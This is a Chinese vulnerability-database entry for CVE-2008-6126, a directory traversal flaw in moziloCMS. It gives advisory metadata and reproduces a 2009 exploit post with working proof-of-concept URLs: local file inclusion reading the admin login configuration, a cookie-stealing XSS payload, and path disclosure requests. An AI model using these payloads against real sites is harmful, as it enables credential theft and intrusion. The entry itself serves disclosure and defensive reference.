mozilo mozilocms 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117562 漏洞类型 路径遍历
发布时间 2009-04-10 更新时间 2009-04-10
CVE编号 CVE-2008-6126 CNNVD-ID CNNVD-200902-296
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8394
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-296
|漏洞详情
moziloCMS是一款基于PHP的使用文件而无需数据就可以创建和管理的一个网站的简单易用的CMS工具。moziloCMS1.10.2及之前版本存在多个目录遍历漏洞。远程攻击者可以借助(1)对download.php的文件参数和(2)对index.php的页参数中的"..",读取任意文件。此漏洞不同于CVE-2008-3589。
|漏洞EXP
###############################################################################################
[+] moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilites
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################################################

[+] Local File Inclusion

 PoC 1 :

   http://127.0.0.1/index.php?cat=10_Willkommen&page=../../../../../BOOTSECT.BAK%00

 PoC 2 :

   http://127.0.0.1/index.php?cat=10_Willkommen&page=../../admin/conf/logindata.conf%00

[+] Cross Site Scripting

 PoC :

   http://127.0.0.1/index.php?action=search&query=<script>alert(document.cookie)</script>

[+] Path Disclosure

 PoC's :

   http://127.0.0.1/gallery.php?gal[]=moziloCMS
   http://127.0.0.1/index.php?cat=10_Willkommen&page[]=10_Willkommen
   http://127.0.0.1/index.php?cat[]=10_Willkommen&page=10_Willkommen
   http://127.0.0.1/download.php?cat=10_Willkommen&file[]=text.txt

###############################################################################################

# milw0rm.com [2009-04-10]
|参考资料

来源:BID
名称:31495
链接:http://www.securityfocus.com/bid/31495
来源:XF
名称:mozilocms-index-directory-traversal(45524)
链接:http://xforce.iss.net/xforce/xfdb/45524
来源:SECUNIA
名称:32021
链接:http://secunia.com/advisories/32021
来源:cms.mozilo.de
链接:http://cms.mozilo.de/index.php?cat=10_moziloCMS&page=60_Changelog